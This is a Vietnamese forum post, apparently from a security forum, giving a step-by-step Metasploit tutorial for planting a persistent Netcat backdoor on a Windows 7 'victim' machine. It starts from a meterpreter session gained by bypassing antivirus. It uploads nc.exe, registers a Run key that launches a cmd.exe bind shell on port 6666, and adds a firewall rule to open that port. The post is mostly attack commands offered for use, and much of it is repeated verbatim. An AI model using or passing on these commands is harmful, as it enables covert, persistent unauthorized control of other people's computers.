maldet
VIP Members
-
31/08/2016
-
112
-
103 bài viết
[Metasploit] Cài Netcat backdoor lên máy Windows 7
Bước 1: Bypass antivirus và get meterpreter session
Bạn có thể xem hướng dẫn tại đây.
Bước 2: Upload Netcat backdoor (nc.exe) lên máy nạn nhân
meterpreter > getsystem
meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\Windows\\System32
Bước 3: Dùng meterpreter để làm cho nc.exe khởi động cùng hệ thống
meterpreter > reg setval -k HKLM\\software\\microsoft\\currentversion\\run -v netcat -d 'C:\\Windows\\System32\\nc.exe -Ldp 6666 -e cmd.exe'
Bước 4: Set firewall mở port 6666
meterpreter > shell
C:\Windows\system32 > netsh firewall
C:\Windows\system32 > netsh firewall show opmode
C:\Windows\system32 > netsh firewall show portopening
C:\Windows\system32 > netsh advfirewall firewall add rule name="netcat" dir=in action=allow protocol=TCP localport=6666
Đã cài backdoor thành công! Kể cả khi nạn nhân shutdown hoặc restart máy thì netcat vẫn không bị gỡ bỏ. Chi tiết xem tại video sau:
Bạn có thể xem hướng dẫn tại đây.
Bước 2: Upload Netcat backdoor (nc.exe) lên máy nạn nhân
meterpreter > getsystem
meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\Windows\\System32
Bước 3: Dùng meterpreter để làm cho nc.exe khởi động cùng hệ thống
meterpreter > reg setval -k HKLM\\software\\microsoft\\currentversion\\run -v netcat -d 'C:\\Windows\\System32\\nc.exe -Ldp 6666 -e cmd.exe'
Bước 4: Set firewall mở port 6666
meterpreter > shell
C:\Windows\system32 > netsh firewall
C:\Windows\system32 > netsh firewall show opmode
C:\Windows\system32 > netsh firewall show portopening
C:\Windows\system32 > netsh advfirewall firewall add rule name="netcat" dir=in action=allow protocol=TCP localport=6666
Đã cài backdoor thành công! Kể cả khi nạn nhân shutdown hoặc restart máy thì netcat vẫn không bị gỡ bỏ. Chi tiết xem tại video sau: